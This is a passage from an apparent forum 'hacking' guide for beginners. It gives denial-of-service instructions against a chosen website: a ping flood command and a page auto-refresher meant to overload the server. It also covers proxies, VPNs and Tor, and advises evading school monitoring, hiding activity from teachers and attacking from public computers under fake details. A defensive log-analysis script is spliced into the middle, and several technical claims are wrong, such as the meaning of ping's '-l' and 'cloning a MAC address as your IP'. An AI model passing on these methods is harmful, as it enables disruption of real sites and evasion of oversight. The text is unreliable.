Example: Site - website.com Page - /example.htm
Press "Start " to start the attack.
Once the number of blocked packets is above 400 you should stop the attack as anything after that will be redundant (won't have any further effect).
Pinging the site: I couldn't remember this method off the top of my head so I have referenced a post made on NextGenUpdate.
1. Open cmd and type 'ping example.com' ^Replace example.com with the site you want to attack
2. Write down the IP address that shows up.
3. So you would type this in ur cmd: ping XX.XXX.X.XXX -t -l ##
^Replace XX.XXX.X.XXX with the IP address you want to attack
^^Replace ## with the amount of time you want to send the attack for. The longer the attack, the more effective it will be.
4. Allow the process to finish. Check back a bit later to see if the site is down.
Refreshing the page: You are probably thinking I'm an idiot for posting this method, but it's probably not what you expected it to be.
I'd like to point out that this method does not involve:
• Pressing F5
• Clicking refresh
So... You guessed it. We will be using an auto-refresher. I recommend Auto-Refresh Plus in the Chrome webstore. Download it and select custom time. Set it to 1 second. This will reload the page every second, and eventually overload the server. This may take some time.
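On the defending side, the dos/ddos distinction in this section appears in access logs as request volume concentrated in one source versus spread across many, and an auto-refresher appears as near-constant gaps between hits on one page. The following is an added example, not part of the original guide; the log format, thresholds, function names and addresses are constructed assumptions.

```python
from collections import defaultdict
from statistics import mean, pstdev


def parse(line):
    """Constructed log format (assumption): '<epoch_seconds> <client_ip> <path>'."""
    ts, ip, path = line.split()
    return float(ts), ip, path


def analyze(lines, window=60.0, per_ip_limit=30, total_limit=120, max_jitter=0.1):
    """Classify the first `window` seconds of traffic. Thresholds are illustrative."""
    events = sorted(parse(l) for l in lines if l.strip())
    by_ip = defaultdict(int)            # requests per source address
    by_ip_path = defaultdict(list)      # timestamps per (source, page)
    for ts, ip, path in events:
        if ts - events[0][0] >= window:
            break
        by_ip[ip] += 1
        by_ip_path[(ip, path)].append(ts)
    total = sum(by_ip.values())
    heavy = sorted(ip for ip, n in by_ip.items() if n > per_ip_limit)

    # An auto-refresher reloads one page at a fixed interval, so the gaps
    # between its hits barely vary; human browsing is far more irregular.
    periodic = []
    for (ip, path), stamps in sorted(by_ip_path.items()):
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        if len(gaps) >= 10 and mean(gaps) > 0 and pstdev(gaps) / mean(gaps) < max_jitter:
            periodic.append((ip, path, round(mean(gaps), 2)))

    top_share = max(by_ip.values()) / total if total else 0.0
    if total > total_limit and top_share < 0.5:
        verdict = "distributed"      # high volume, no dominant source: per-IP limits miss it
    elif heavy:
        verdict = "single-source"    # one address over budget: per-IP rate limit or block
    else:
        verdict = "normal"
    return {"verdict": verdict, "total": total,
            "heavy_sources": heavy, "periodic_clients": periodic}


# Constructed sample traffic using documentation address ranges (RFC 5737).
def sample_single_source():
    refresher = [f"{1000 + i} 203.0.113.7 /example.htm" for i in range(50)]
    visitors = ["1003.2 198.51.100.4 /", "1017.9 198.51.100.9 /about",
                "1041.5 198.51.100.4 /example.htm"]
    return refresher + visitors


def sample_distributed():
    return [f"{2000 + (i * 7) % 55 + k * 0.37} 192.0.2.{i + 1} /example.htm"
            for i in range(200) for k in range(2)]


if __name__ == "__main__":
    for name, data in (("single", sample_single_source()),
                       ("distributed", sample_distributed())):
        print(name, analyze(data))
```

A single-source flood is handled by a per-address rate limit or block, while the distributed case has no dominant address and needs aggregate controls such as upstream filtering or caching.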
SECTION 12 - Staying anonymous
Staying anonymous while online is something that many people can't seem to do. Every day, I go on HF and look through the beginner hacking section. And every time I see 10-20 threads all asking the same sort of thing. "How to hide IP?" "Change IP?" "Free VPN?" "How to staying anonymous?". And I always see the same replies. "Damn kid. Doesn't even know how to use a proxy" "We are not your army" "Ever heard of this magical thing called Google?" "Use the search button before posting". For those of you that encounter that sort of thing, I hope the following sections answer your questions. First off, why is it important to stay anonymous? Well, this question shouldn't really need answering. If you don't stay anonymous, you're effectively allowing people to steal your identity. It's important to cover your tracks while online because there will always be somebody there, waiting to exploit even the first slip-up they see. Moral of the story: STAY ANONYMOUS!! The following 4 sections will teach you how to do that.
SECTION 13 – Proxies
Everyone has heard of proxies. Thing is, most people have no idea how to use them. Before I show you how to use a proxy, I will explain a little bit about what a proxy is and what it does. Every network has its own IP address. When you visit a website, it logs your IP address. Now, some websites don't like certain IP addresses to access them. So they block that IP address from accessing the page. What a proxy is, is basically a tunnel that all the traffic from that page goes through. The tunnel sends the traffic to another IP address. This tricks the website into thinking that the IP address at the end of the tunnel is yours, and allows you access to the page. Now that you know what a proxy is, you can set one up. First off, find a proxy (free proxies can be found at http://hidemyass.com). Every (common) browser has proxy settings, so find your browser's proxy settings area. For Google Chrome, go 'Tools'-->'Advanced'-->'LAN options'-->'Proxy settings'. Type in the proxy then select the appropriate settings (e.g. HTTPS or Socks5). Then you need to restart Chrome (just close it then open it again). Go to http://whatismyip.com to check if the proxy is working properly. If it is, it should display a different IP to your actual one.
SECTION 14 - VPN's
Many of you have probably heard of VPN's before. For those of you who don't know what they are, VPN's are Virtual Private Networks. A detailed explanation of what they are can be found in section 6. Connecting to a VPN is really easy.
I will teach you how to connect to a VPN on:
• Your PC
• Your iDevice
Before I teach you how to do that, you will need to find a VPN to use. Here is a list of VPN's you might want to try.
Free VPN's:
• http://bestcanadavpn.com Best Canada VPN
• http://hideme.ru HideMe.ru
• http://hotspotshield.com Hotspot Shield
Paid VPN's:
• http://hidemyass.com HideMyAss
• http://nvpn.com nVPN
• http://openvpn.net OpenVPN
How to connect to a VPN on your PC:
This will teach you how to connect to a VPN on your PC.
- Click on the WiFi icon on the taskbar.
- Select the option ‘Open Network and Sharing Center’
- Click ‘Connect to a new connection or network’
- Select ‘Connect to a workplace’ and then click next
- Click next
- Select ‘Use my internet (VPN)’
- Type in the address of the VPN you want to connect to
- Type in the username and password then click Connect
- You should see the screen
You’re done! This should appear.
How to set up a VPN on your iDevice:
Here's how to connect to a VPN using your iDevice. For this tutorial we will be using the free VPN, BestCanadaVPN. I will be going over all the steps needed to set this up and a few other things.
- First off, you need to open up settings.
- Now go "General"-->"Network"-->"VPN"
- Now tap the "Add VPN configuration" button. It will bring up this menu.
- Now fill in the boxes with these.
Description: VPN
Server: bestcanadavpn.com
Account: free
Secret: (put anything here)
- Now we need to get the password. So open up safari and head over to bestcanadavpn.com. You will see the password on the homepage.
- Now type the password into the "Password" box in the VPN configuration.
- Now tap "Save".
Congratulations! You have just set up the VPN on your iDevice! Now you need to connect to it. To do that just press the "On" button. Once you are connected, it will say so and a VPN icon will appear in the status bar.
***PLEASE NOTE*** The VPN password changes every 24 hours.
Using a VPN will provide a significant amount more protection than a proxy, but won't make you completely untraceable.
SECTION 15 – Alternatives, tips and tricks
This section will cover some of the alternatives to proxies and VPN's. These methods are probably a little bit harder to use, but they are just as good (if not better).
Change your IP
Most routers have a setting which allows you to clone your MAC address and set it as your IP address. This allows you to hide your location and disguise it as.
Use anonymous web searches
Some sites offer anonymous web searches. This doesn't offer very good anonymity, but hey, it's better than nothing.
Ctrl+Shift+Delete
This amazing little shortcut can clear cookies and data, web history and autofill data incredibly quickly! It's great and takes almost no time to do.
Put Tor on a USB
Tor is a network which provides anonymity while on the Internet. Most schools will not allow you to download it and install it. So just download it onto a USB at home and run it when you get to school. Your school won't have a clue what you are doing online!
Use private browsing
Most browsers have a private browsing option. This opens up a session which doesn't save cookies, and can't be tracked in an administrator system. It's great because anyone can use it.
Double Desktop Switcher
Yup, everyone knows this one, but it does work! Download Double Desktop Switcher onto a USB and bring it to school. You can do whatever you want and when a teacher walks by just press the hotkey to change screens.
Use your mobile/iPod
Most schools think they are smart and monitor all the traffic on their computers. The reality is that they are dumb idiots as they don't monitor mobile traffic. I have downloaded torrents and done a whole bunch of stuff on my iPod and my school hadn't had a clue!
Use public computers
Don't do hacking stuff from home. Go to an Internet cafe or the library. Bring all your stuff on a USB and run it from that.
Combine methods
If you seriously want to stay safe while online, try this: Go to a public place and use a public computer. Sign in with fake information. Connect to a paid VPN. Go online using private browsing. Then set up your browser so it uses a paid web proxy. Open up Tor on your USB. Go to a site which offers anonymous web searching.
With all of that, your Internet will probably be so slow it's unbearable, but you will be anonymous!!!! Oh yeah... did I mention that all of these will slow your internet connection speed? No? Too bad.
I’m kidding. They will slow down your connection, but not by very much, so the trade-off is worth it.
SECTION 16 – Extending your knowledge
“Don’t learn to hack, hack to learn”. You’ve probably seen that posted all around the internet. To a certain extent, it’s true. Hacking is often used to gain knowledge you wouldn’t otherwise be able to know. However if you don’t learn to hack, how can you hack?
This section will help you discover ways to extend your knowledge of hacking. Now, in order to do this, you will need to spend extensive amounts of time browsing the internet. There’s no other way. There are also no shortcuts. If you don’t put in the work, you won’t get the results. End of story.
Now that we’ve got that out of the way, let’s begin.
Since you’re probably too lazy to use google, here are some useful sites:
• Hackforums.net
• Crackhackforum.com
• Hackthissite.org
Those are pretty much the only sites you will need to start off with. They have almost ENDLESS supplies of knowledge, and have relatively friendly members. Sign up for those sites and you’ll be well on your way to becoming a successful hacker.
SECTION 17 – Closing section
Congratulations, you’ve finally reached the last section! I bet it took you a while to read through all of that, but you’ve probably learned a lot too. Now most of my knowledge has been passed down to you. I put a lot of time and effort into typing this up (7 hours to be more precise), and spell-checked this over 50 times. I even added images in (lucky you) so this guide would be easy to follow. So please, post a short thank you message in the original thread. That takes 30 seconds, this took 7 hours.
Remember, knowledge is power. But if you misuse that power it will be taken away from you. Stay true to yourself and the world will do so as well.